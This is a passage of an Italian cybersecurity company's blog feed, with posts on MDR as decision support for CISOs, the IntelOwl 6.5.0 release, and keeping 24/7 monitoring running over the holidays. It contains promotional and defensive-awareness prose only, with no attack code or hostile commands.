&lt;/ul&gt;
&lt;p&gt;Questo consente al CISO di spostare il baricentro delle decisioni: dalle priorità “per principio” alle priorità basate su ciò che l’organizzazione sta realmente affrontando.&lt;/p&gt;
&lt;p&gt;Oggi le dinamiche di attacco si sviluppano con una rapidità incompatibile con processi decisionali lenti o frammentati.
Quando i segnali si accumulano senza essere interpretati, il rischio non è solo “non vedere”, ma &lt;strong&gt;decidere troppo tardi o nel punto sbagliato&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In questo contesto, la capacità di capire rapidamente &lt;strong&gt;dove intervenire e perché&lt;/strong&gt; diventa più rilevante dell’aggiungere nuovi livelli di complessità tecnologica.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/il-fattore-umano-nell-mdr-come-valutare/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIDBf/EABQBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAdWTVRBQf//EABoQAAMAAwEAAAAAAAAAAAAAAAABAgMSMkH/2gAIAQEAAQUC9yU5JvZT0I//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAXEAADAQAAAAAAAAAAAAAAAAAAAREQ/9oACAEBAAY/AhSssHv/xAAaEAACAgMAAAAAAAAAAAAAAAAAARExECHh/9oACAEBAAE/IVrgmqsclgLLRRR//9oADAMBAAIAAwAAABBwL//EABYRAQEBAAAAAAAAAAAAAAAAAAEAEf/aAAgBAwEBPxAJMv/EABcRAQADAAAAAAAAAAAAAAAAAAABESH/2gAIAQIBAT8QtGv/xAAcEAEAAgMAAwAAAAAAAAAAAAABACERMUFRkfD/2gAIAQEAAT8QCqICwgCVjWC8J5hdQxdRu37MASwb7OS9T//Z&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg&quot; srcset=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/4ecad/Valutare-le-competenze-umane.jpg 384w,
/website/static/6a6afe1626f014faadb2dc84888723cf/212bf/Valutare-le-competenze-umane.jpg 768w,
/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg 1536w,
/website/static/6a6afe1626f014faadb2dc84888723cf/294ea/Valutare-le-competenze-umane.jpg 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Oltre il rilevamento e la risposta&lt;/h2&gt;
&lt;p&gt;Uno dei limiti più comuni nella governance della sicurezza è la distanza tra ciò che viene osservato operativamente e ciò che viene discusso a livello decisionale.&lt;/p&gt;
&lt;p&gt;Un MDR d’élite colma questo divario perché non si limita a descrivere singoli eventi, ma consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;osservare l’evoluzione delle esposizioni nel tempo;&lt;/li&gt;
&lt;li&gt;distinguere segnali isolati da dinamiche persistenti;&lt;/li&gt;
&lt;li&gt;capire quali aree continuano a richiedere attenzione, anche dopo interventi correttivi.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In questo modo, la sicurezza smette di essere una sequenza di incidenti scollegati e diventa una &lt;strong&gt;lettura continua di ciò che merita di essere governato&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Scenario: il giorno dopo l’incidente&lt;/h2&gt;
&lt;p&gt;Un incidente è stato contenuto.
Non ci sono stati impatti gravi sulla continuità operativa. Il peggio sembra passato.
Il giorno dopo, il board chiede un confronto.&lt;/p&gt;
&lt;p&gt;Le domande non sono tecniche:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Come è potuto accadere?&lt;/li&gt;
&lt;li&gt;Siamo esposti allo stesso modo oggi?&lt;/li&gt;
&lt;li&gt;Cosa cambia, concretamente, da questo momento in poi?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;È in questo momento che emerge il vero valore dell’MDR.
Un MDR puramente operativo fornisce una timeline tecnica.&lt;/p&gt;
&lt;p&gt;Un MDR orientato al decision enablement fornisce:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;il contesto dell’attacco rispetto a segnali già osservati in precedenza;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;una visione chiara di ciò che è stato contenuto e di ciò che continua a richiedere attenzione e presidio&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;gli elementi per spiegare quali decisioni sono state prese e su quali basi.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Non è una questione di comunicazione.
È una questione di &lt;strong&gt;responsabilità e governance&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Dal SOC alla boardroom: quando l’MDR diventa linguaggio comune&lt;/h2&gt;
&lt;p&gt;Il board non ha bisogno di dettagli tecnici.
Ha bisogno di capire se l’organizzazione sta migliorando o peggiorando la propria capacità di gestire le minacce.&lt;/p&gt;
&lt;p&gt;Gli output MDR che funzionano davvero a livello executive sono quelli che:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;mostrano trend, non solo istantanee;&lt;/li&gt;
&lt;li&gt;collegano eventi a potenziali impatti;&lt;/li&gt;
&lt;li&gt;rendono esplicite le scelte fatte e le aree che richiedono ancora miglioramenti.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Nella pratica, molte organizzazioni sperimentano ancora un limite evidente: report di sicurezza tecnicamente accurati, ma poco utili quando si tratta di prendere decisioni di governance.
Il punto non è produrre più report, ma &lt;strong&gt;trasformare segnali operativi in informazioni comprensibili, contestualizzate e azionabili&lt;/strong&gt; per chi ha responsabilità di governance.&lt;/p&gt;
&lt;p&gt;In questo senso, l’&lt;strong&gt;MDR diventa un abilitatore&lt;/strong&gt;: traduce segnali operativi in informazioni utilizzabili per decidere.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;MDR come estensione del ruolo del CISO&lt;/h2&gt;
&lt;p&gt;Un MDR maturo non si limita a reagire agli eventi.
È progettato per &lt;strong&gt;intercettare, comprendere e governare ciò che accade&lt;/strong&gt;, mantenendo il controllo anche nelle situazioni più complesse.&lt;/p&gt;
&lt;p&gt;Fornisce qualcosa di più realistico e più utile: &lt;strong&gt;consapevolezza operativa continua&lt;/strong&gt;.
Riduce l’ambiguità.
Fornisce contesto.
Permette al CISO di spiegare non solo cosa è successo, ma cosa continua a richiedere attenzione, perché determinate scelte sono state fatte e perché è necessario attuarne delle nuove.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;L’MDR che fa davvero la differenza&lt;/h2&gt;
&lt;p&gt;Il valore reale di un MDR oggi non si misura solo in:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;incidenti rilevati,&lt;/li&gt;
&lt;li&gt;tempi di risposta,&lt;/li&gt;
&lt;li&gt;volumi di alert gestiti.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Si misura nella &lt;strong&gt;qualità delle decisioni che abilita&lt;/strong&gt;.
Nella capacità di portare chiarezza quando serve decidere.&lt;/p&gt;
&lt;p&gt;E nella solidità con cui il CISO può sostenere quelle decisioni, anche nei momenti più delicati.
&lt;strong&gt;È lì che l’MDR smette di essere un servizio operativo e diventa una funzione strategica&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/malware-analysis-clickfix/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1494px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAABYlAAAWJQFJUiTwAAAB4ElEQVR42l2R207bQBCG/eYNkIJSqS1ChKK2tBERORTlirSpFIcozgkTG4jjNfFx7bV31psqEo/QcbioVOnXaHakb2b2HyUIkxtV0yb6r99948FiXIYJdyl4FNYRrHxOfCAuOCHEqWCZWPvi2QOaQMJACSOmjcau7YwGt2trtRVyk/KMAU8hR2VcpoBiCY8QSEUU7zoGPIxBSZiouS8XZNvwXurP25Yjr4jse/l3e9N2ZJPIi5Ws2/KLJa0QAso9KgIqnLDglSjhPYc3iKxb8HUpaktoEzFwRZvkLVLAVWvTIJsm2ZA4h0wwlvuhsH2OKygsFZPhaDq4fZzfYRz3VXM2n2kTTVXV7s9xv5+nWZ6wPyyllMUJT5IsiDLicy/iShgy43E11U3deNKm+kw3xxjvjKE2Q2Flrpv35nJhWpgsjKfZfOG6UUTzAOHmZcO4f7AtB0vofMpz3KWYwAATjDTO8Lmr4Ngioamwg92fK3vl4/2j96XD5mmt275Re0NsgR4jtuOLFii8jU8BHX494Tri65ArJ6W3J2/K5wcfL8tnldK76v5p6+r6deY/pRAzwFMh6UZoOMeIziufypXq3tH5wYd65XPnW6fb6v247vwPM0DXCuNwC577MVg+BDH8BaBL7DDVOtwuAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/008c4049132761c45ef359ea58141cb2/7db30/Malware%20ClickFix.png&quot; srcset=&quot;/website/static/008c4049132761c45ef359ea58141cb2/804b2/Malware%20ClickFix.png 384w,
/website/static/008c4049132761c45ef359ea58141cb2/e5715/Malware%20ClickFix.png 768w,
/website/static/008c4049132761c45ef359ea58141cb2/7db30/Malware%20ClickFix.png 1494w&quot; sizes=&quot;(max-width: 1494px) 100vw, 1494px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[IntelOwl 6.5.0]]></title><description><![CDATA[Nuova release e oltre 4.500 “stars” su GitHub]]></description><link>https://www.certego.net/blog/intelowl-nuova-release-certego/</link><guid isPermaLink="false">intelowl-nuova-release-certego</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 08 Jan 2026 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/intelowlproject/IntelOwl/blob/develop/.github/CHANGELOG.md#v650&quot;&gt;Siamo lieti di annunciare il rilascio di IntelOwl 6.5.0&lt;/a&gt;, la nuova release della piattaforma open source di Threat Intelligence Investigation, integrata nell’ecosistema applicativo proprietario di Certego, che continua a evolversi anche grazie al contributo della community internazionale.&lt;/p&gt;
&lt;p&gt;La release introduce un importante aggiornamento dell’interfaccia utente e arriva in un momento significativo per il progetto, che ha recentemente superato le 4.500 “stars” su GitHub, confermandosi come uno dei progetti open source più apprezzati nel panorama della cyber threat intelligence.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Il ruolo di IntelOwl in Certego&lt;/h2&gt;
&lt;p&gt;IntelOwl è integrata nativamente con la piattaforma di Unified Security Operations PanOptikon® e con l’ecosistema applicativo proprietario di Certego, rappresentando uno strumento fondamentale per le attività quotidiane degli analisti Certego. Grazie a questa integrazione, gli analisti possono contare su un sistema di Threat Intelligence ad alta precisione e affidabilità, che consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;monitorare e validare in tempo reale gli indicatori di compromissione (IOC);&lt;/li&gt;
&lt;li&gt;svolgere analisi approfondite su domini, file, IP, hash e altri osservabili;&lt;/li&gt;
&lt;li&gt;correlare evidenze tecniche e conoscenze umane in un unico flusso operativo integrato.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/malware-analysis-clickfix/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACKUlEQVR42mWSWU/bUBCF+eelYWmhalXaCgpCqKCEQJq3UlrkbJDEJCxRjGMnTrxc2/d6qWj7XB58OtehUiUejo7HHn0z45kFx/Vx2lJxoV7hTKnjeqDB5zEcn8PyRK6xK6DPOIyZwMgSMB0BFkZ53tiOYFrzmAX8YcHxAjQbLZh3OppKDfpggJ9xgiTkCAMOEQrEuTi9E0gCgYCKOUzkQJtcn1IxKjrzCBhQUtH6jV3jHsfTXyiN71ExExwaCWrTGMVRggo9H5H29ARVM8aOlkKnLm0mp4gIRF0ScGQT0KNqX02Og1GKfU1gZxhhT4tQGsVQrAhlIyYlKJE2hikVSvFJT2GwGJzTmH4Mi8Y2qIDDCMhoBLXdQafRxG2vT97ARa2OG7UHtdPFRb2B+vcztBQFPAgR+QF+hCE8RqJm6L9RhyEMglouAW1ailxEm5aiXg3Qal+ic3mN824PXfJmW0X9vEt+CbV/i97NEP1bDT3KvSaXOeZ4Bs9LMXMIWD4o4ap/gzvNwIQ+TG0GP9+YgPvYhYyl/4ulM3LvUa4v8pFHdviwsF5YxbvlNbwtvMThh32cVL5AOW0Q2EMokhz8vyRcAuQ5zdjc5RlN5GIkcGNxFe+frWBr6Q2KKx/xanEdm0ubOCpV4QfRE+BcBCVJ2OTxVufbppG3lgnw/AW2C69RXNtGdfczTsrfssPyceYxntFIT0TQzA9F5gVRxsI4m7g8G9ItTl3+5y8yZLHM984PvQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Malware ClickFix&quot; title=&quot;&quot; src=&quot;/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/71c1d/Malware%20ClickFix.png&quot; srcset=&quot;/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/804b2/Malware%20ClickFix.png 384w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/e5715/Malware%20ClickFix.png 768w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/71c1d/Malware%20ClickFix.png 1536w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/a878e/Malware%20ClickFix.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Nuova UI per Artifacts / Analyzables&lt;/h2&gt;
&lt;p&gt;Tra le principali novità della versione 6.5 spicca l’aggiornamento dell’interfaccia utente, che introduce una nuova pagina dedicata agli “Artifacts”, detti anche “Analyzables”.
Gli analyzables rappresentano un observable o un sample utilizzato durante le attività di analisi. Grazie a questa nuova sezione della UI, è ora possibile:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;salvare le valutazioni associate a ciascun observable o sample&lt;/li&gt;
&lt;li&gt;fare in modo che queste valutazioni contribuiscano ai risultati delle analisi&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Un aggiornamento che rende l’interfaccia più completa e allineata alle esigenze operative di chi utilizza IntelOwl quotidianamente per attività di investigation e threat intelligence.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Una community in continua crescita&lt;/h2&gt;
&lt;p&gt;Il superamento delle 4.500 stelle su GitHub rappresenta un ulteriore riconoscimento del valore di IntelOwl come progetto open source, utilizzato e supportato da analisti e team di sicurezza in tutto il mondo.
&lt;a href=&quot;https://github.com/intelowlproject/IntelOwl/blob/develop/.github/CHANGELOG.md#v650&quot;&gt;Per il dettaglio completo delle modifiche introdotte con la versione 6.5 è possibile consultare il changelog ufficiale sul repository GitHub di IntelOwl.&lt;/a&gt;&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/certego-a-skytg24/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1492px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 55.989583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAACqklEQVR42gGfAmD9AJiip5qts7G1t5WZmpCVlre4s7i3tLSzsK2ur7a0srKwr6+urq6trq+usK2srq+vs6Olro2XsH+AiHt7fQCfq7Setb+cpaqDiY+OlZu7vsHDwMC8uLi4ubzEw8W9u7u7uLq6tri0s7arq66ur7WlqbRpe7AvLVEZFzMApK+6laWvkZiefYKHk5yjxcjLyMfHw7/BsbK3k42Pmpulg4mahYydqamxtra4tri8q7C9WW23LSt6JyJqAFNNUDksLVBFRUY+QFRPU5yVlLewrry5uaahoWdSTG9vgERRezhEbWJkf3NziHFxhnN1i3d6kIGGnIaKnQBCNjY1JyhFOz1HPT4oGx4+Ly2ObFyahIFfVlVPR0tdZog0Sn0aLmcjNm4kN3AkOXEeM2wyRn1EV49HSmMATUNERz0+SkBBPDAxKB4iTTkyfWZakYF/MSstAAADIixMMEeBK0F6LkF6JT56GzZzFjNwITx4LkV/Ky5DACogIzAmKjQqLScgJCMbIIJrZ3VvcjMxPDExPS4uOi45Yyk5gTRGhi5BfTRZlEBXjjJSji4+dTFCdyMlNwAbDQ0hExMfExRGLiuDXVavlI19d3knKEY8Rmk1O2InLlgbImoQHGwTInMXKnUfMnQlPXwlM24eMGsREyAAHhwnHRwpJyYykG5utpCQsZyXZGFlNzVOR0ZgPjxVSEJOY11fXltoVFZyQkp2M0F8M0OALj56LzxuKioxACqE3lib3V+f32Ki5Gik4q+zt6SkpKmqqKenpa+vraenp7+/vbi4s66tpre2saiop77BxPDz9uvt7+3u7QCTj56jnqqxr7man7Cgr8PIwL29sa2roaCYj46KgoK3rqvQycfNxcPEvbytqKipo6CpoJyup6KxqqiOiIl1+TFzbLsRVwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;certego sky&quot; title=&quot;&quot; src=&quot;/website/static/e34b5bcedf096859274c7dba66aac732/b1ffc/certego%20sky.png&quot; srcset=&quot;/website/static/e34b5bcedf096859274c7dba66aac732/804b2/certego%20sky.png 384w,
/website/static/e34b5bcedf096859274c7dba66aac732/e5715/certego%20sky.png 768w,
/website/static/e34b5bcedf096859274c7dba66aac732/b1ffc/certego%20sky.png 1492w&quot; sizes=&quot;(max-width: 1492px) 100vw, 1492px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[I cyber attacchi non vanno in vacanza]]></title><description><![CDATA[Come proteggere la tua azienda (anche) durante le feste]]></description><link>https://www.certego.net/blog/i-cyber-attacchi-non-vanno-in-vacanza/</link><guid isPermaLink="false">i-cyber-attacchi-non-vanno-in-vacanza</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 17 Dec 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Natale è il momento dell’anno in cui rallentiamo, stacchiamo la spina e ci concediamo qualche giorno di meritato riposo.&lt;/p&gt;
&lt;p&gt;Uffici più vuoti, team ridotti, ritmi meno serrati.&lt;/p&gt;
&lt;p&gt;Ma mentre molti staccano, i cyber criminali no!&lt;/p&gt;
&lt;p&gt;Anzi, le festività sono spesso uno dei periodi preferiti per colpire: meno presidi, tempi di risposta più lunghi e un’attenzione inevitabilmente più bassa rendono le aziende un bersaglio più facile.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Le festività: un momento critico per la sicurezza&lt;/h2&gt;
&lt;p&gt;Durante le vacanze natalizie cambiano le abitudini operative delle aziende:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;personale IT ridotto o in ferie&lt;/li&gt;
&lt;li&gt;minore presidio dei sistemi&lt;/li&gt;
&lt;li&gt;maggiore utilizzo di accessi remoti&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;È proprio in questi contesti che un incidente di sicurezza può trasformarsi rapidamente in un problema serio, soprattutto se non viene rilevato e gestito tempestivamente.
Un attacco che passa inosservato per ore o giorni può causare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;interruzioni operative&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;perdita o compromissione dei dati&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;impatti economici e reputazionali&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;difficoltà nel ripristino dei sistemi&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;&amp;lt;br&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/br&gt;
&lt;h2&gt;Perché la sicurezza non può fermarsi&lt;/h2&gt;
&lt;p&gt;La sicurezza informatica non è un’attività “a orario d’ufficio”.
Le minacce sono continue, automatizzate e spesso progettate per sfruttare proprio i momenti di minore attenzione.
Per questo motivo è fondamentale garantire:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;monitoraggio costante dell’infrastruttura&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;capacità di rilevare tempestivamente comportamenti anomali&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;intervento rapido in caso di incidente&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Anche – e soprattutto – quando l’azienda è chiusa per le festività.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/il-fattore-umano-nell-mdr-come-valutare/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAKABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIDBf/EABQBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAdWTVRBQf//EABoQAAMAAwEAAAAAAAAAAAAAAAABAgMSMkH/2gAIAQEAAQUC9yU5JvZT0I//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAXEAADAQAAAAAAAAAAAAAAAAAAAREQ/9oACAEBAAY/AhSssHv/xAAaEAACAgMAAAAAAAAAAAAAAAAAARExECHh/9oACAEBAAE/IVrgmqsclgLLRRR//9oADAMBAAIAAwAAABBwL//EABYRAQEBAAAAAAAAAAAAAAAAAAEAEf/aAAgBAwEBPxAJMv/EABcRAQADAAAAAAAAAAAAAAAAAAABESH/2gAIAQIBAT8QtGv/xAAcEAEAAgMAAwAAAAAAAAAAAAABACERMUFRkfD/2gAIAQEAAT8QCqICwgCVjWC8J5hdQxdRu37MASwb7OS9T//Z&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg&quot; srcset=&quot;/website/static/6a6afe1626f014faadb2dc84888723cf/4ecad/Valutare-le-competenze-umane.jpg 384w,
/website/static/6a6afe1626f014faadb2dc84888723cf/212bf/Valutare-le-competenze-umane.jpg 768w,
/website/static/6a6afe1626f014faadb2dc84888723cf/ac99c/Valutare-le-competenze-umane.jpg 1536w,
/website/static/6a6afe1626f014faadb2dc84888723cf/294ea/Valutare-le-competenze-umane.jpg 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;MDR: la protezione continua che non si ferma mai&lt;/h2&gt;
&lt;p&gt;Un servizio di Managed Detection and Response (MDR) nasce proprio per rispondere a questa esigenza: garantire una protezione costante dei sistemi informativi, indipendentemente dalla presenza del team IT interno.&lt;/p&gt;
&lt;p&gt;Anche durante le festività, mentre l’operatività rallenta e le risorse sono ridotte, un servizio MDR combina tecnologie di monitoraggio avanzate e competenze specialistiche attive 24/7 per individuare e contenere tempestivamente le minacce, riducendo al minimo gli impatti sul business.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Monitoraggio continuo, 24 ore su 24&lt;/h3&gt;
&lt;p&gt;Il Security Operations Center di Certego è composto da specialisti senior con competenze eterogenee e certificazioni riconosciute a livello internazionale.
Grazie alla piattaforma proprietaria di Unified Security Operations PanOptikon®, i servizi MDR di Certego assicurano una sorveglianza continua sull’intera infrastruttura aziendale.&lt;/p&gt;
&lt;p&gt;PanOptikon® integra sonde e agenti a livello di rete, endpoint e ambienti cloud, monitorando in tempo reale il traffico e analizzando i dati telemetrici per individuare comportamenti anomali o segnali di compromissione.&lt;/p&gt;
&lt;p&gt;Ogni evento sospetto viene analizzato dal team di Security Operations per:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;comprenderne l’origine&lt;/li&gt;
&lt;li&gt;verificarne l’effettiva pericolosità&lt;/li&gt;
&lt;li&gt;definire la strategia di risposta più efficace&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Con l’obiettivo di ridurre al minimo la finestra di esposizione e mantenere un livello di protezione sempre elevato.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h3&gt;Incident Response: quando conta davvero la rapidità&lt;/h3&gt;
&lt;p&gt;Rilevare un attacco è fondamentale, ma è la qualità della risposta a fare la differenza.&lt;/p&gt;
&lt;p&gt;In caso di incidente, il Rapid Incident Response Team di Certego interviene seguendo procedure strutturate, testate e costantemente aggiornate, basate sui principali modelli operativi internazionali, come il MITRE ATT&amp;#x26;CK Framework.&lt;/p&gt;
&lt;p&gt;L’approccio prevede:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;intervento immediato, per contenere e neutralizzare la minaccia&lt;/li&gt;
&lt;li&gt;riduzione del downtime, preservando la continuità operativa&lt;/li&gt;
